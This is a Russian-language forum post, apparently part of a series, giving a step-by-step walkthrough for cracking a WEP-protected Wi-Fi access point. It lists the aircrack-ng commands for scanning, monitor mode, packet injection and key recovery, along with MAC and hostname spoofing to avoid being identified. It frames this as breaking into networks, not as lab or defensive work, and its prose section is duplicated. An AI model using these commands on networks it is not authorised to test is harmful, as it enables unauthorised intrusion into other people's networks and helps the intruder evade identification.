- Регистрация
- 4 Фев 2025
- Сообщения
- 18
- Реакции
- 2
В прошлой статье мы рассмотрели инструменты для взлома Wi-Fi и способ обойти фильтрацию по MAC адресу.
Сегодня мы разберем ситуацию когда точки защищены ключами с WEP и WPA шифрованием.
Не буду писать длинное вступление, а сразу приступим к делу.
Пример с закрытой точкой, с шифрованием WEP -
Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid
Узнаем свой MAC адрес
Имеем
Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:
Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):
Ловим пакеты от нашей точки.
Тут mon0 — интерфейс созданный airmon-ng, 6 — канал точки доступа, 00:14:d1:4b:06:7e — ее мак адрес. wep — имя файлов с данными. Можно принципе ждать, но лучше ускорится =) В новой консоли делаем следующее:
Тут ClonNET — ssid точки доступа, 00:14:D1:4B:06:7E — ее MAC адрес, 1C:4B:D6:B8:23:E5 — наш MAC адрес, mon0 — наш интерфейс. Пакеты заметно полились быстрее в первой консоли с airodump-ng. Теперь можно ломать.
Тут wep*.cap — имя файлов что указано было выше. Процесс подумает, посчитает и выдаст нам ключ к сети, если не выдаст то скажет сколько еще пакетов нам с Вами собрать.
Продолжение про WPA шифрование в 3 части. Всем спасибо за внимание!
Сегодня мы разберем ситуацию когда точки защищены ключами с WEP и WPA шифрованием.
Не буду писать длинное вступление, а сразу приступим к делу.
Пример с закрытой точкой, с шифрованием WEP -
Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid
Код:
sudo airodump-ng wlan0
Код:
ifconfig wlan0
- Мой MAC адрес: 1C:4B:D6:B8:23:E5
- MAC адрес точки доступа: 00:14:D1:4B:06:7E
- SSID точки доступа: ClonNET
- Канал точки доступа: 6
Код:
sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0 6
Код:
sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up
Код:
sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda
Код:
sudo airodump-ng mon0 -w wep -c 6 --bssid 00:14:d1:4b:06:7e
Код:
sudo aireplay-ng -1 0 -e ClonNET -a 00:14:D1:4B:06:7E
-h 1C:4B:D6:B8:23:E5 mon0
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF
-b 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0
Код:
aircrack-ng -P 1 wep*.cap
Продолжение про WPA шифрование в 3 части. Всем спасибо за внимание!